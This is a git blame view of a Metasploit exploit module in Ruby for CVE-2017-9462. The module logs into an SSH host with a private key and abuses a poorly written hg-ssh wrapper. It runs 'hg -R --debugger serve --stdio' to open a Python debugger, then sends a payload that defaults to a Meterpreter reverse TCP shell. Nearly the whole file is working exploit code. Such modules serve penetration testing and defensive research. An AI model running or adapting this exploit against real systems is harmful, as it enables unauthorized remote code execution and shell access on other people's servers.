Files
metasploit-gs/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

133 lines
3.8 KiB
Ruby
Raw Normal View History

2022-04-18 20:05:46 +02:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2017-04-18 16:33:23 -04:00
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
2022-04-18 20:05:46 +02:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Mercurial Custom hg-ssh Wrapper Remote Code Exec',
'Description' => %q{
This module takes advantage of custom hg-ssh wrapper implementations that don't
adequately validate parameters passed to the hg binary, allowing users to trigger a
Python Debugger session, which allows arbitrary Python code execution.
},
'License' => MSF_LICENSE,
'Author' => [
2017-04-18 16:33:23 -04:00
'claudijd',
],
2022-04-18 20:05:46 +02:00
'References' => [
[ 'CVE', '2017-9462' ],
2022-04-18 20:05:46 +02:00
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
2017-04-18 16:33:23 -04:00
],
2022-04-18 20:05:46 +02:00
'DefaultOptions' => {
'Payload' => 'python/meterpreter/reverse_tcp'
2017-04-18 16:33:23 -04:00
},
2022-04-18 20:05:46 +02:00
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => '2017-04-18',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
2017-04-18 16:33:23 -04:00
register_options(
[
2017-04-18 19:27:35 -04:00
Opt::RHOST(),
2017-04-18 16:33:23 -04:00
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
2017-04-26 01:35:14 -05:00
OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
2017-04-18 16:33:23 -04:00
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
2017-04-18 19:27:35 -04:00
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
2017-04-18 16:33:23 -04:00
def username
datastore['USERNAME']
end
def ssh_priv_key
File.read(datastore['SSH_PRIV_KEY_FILE'])
end
def exploit
2022-04-18 19:46:51 +02:00
ssh_options = ssh_client_defaults.merge({
2022-04-18 20:05:46 +02:00
auth_methods: ['publickey'],
key_data: [ ssh_priv_key ],
port: rport
2022-04-18 19:46:51 +02:00
})
2017-04-18 16:33:23 -04:00
2022-04-18 20:05:46 +02:00
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
2017-04-18 16:33:23 -04:00
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
2022-04-18 20:05:46 +02:00
# rubocop:disable Lint/ShadowingOuterLocalVariable
2017-04-18 16:33:23 -04:00
if ssh
2022-04-18 20:05:46 +02:00
print_good('SSH connection is established.')
2017-04-18 16:33:23 -04:00
ssh.open_channel do |ch|
2022-04-18 20:05:46 +02:00
ch.exec 'hg -R --debugger serve --stdio' do |ch, _success|
ch.on_extended_data do |ch, _type, data|
2017-04-18 16:33:23 -04:00
if data.match(/entering debugger/)
print_good("Triggered Debugger (#{data})")
ch.send_data "#{payload.encoded}\n"
else
2017-07-19 12:48:52 +01:00
print_error("Unable to trigger debugger (#{data})")
2017-04-18 16:33:23 -04:00
end
end
end
end
2022-04-18 20:05:46 +02:00
# rubocop:enable Lint/ShadowingOuterLocalVariable
2017-04-18 16:33:23 -04:00
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e)
2017-04-18 16:33:23 -04:00
end
end
end
2017-04-18 18:52:53 -04:00
end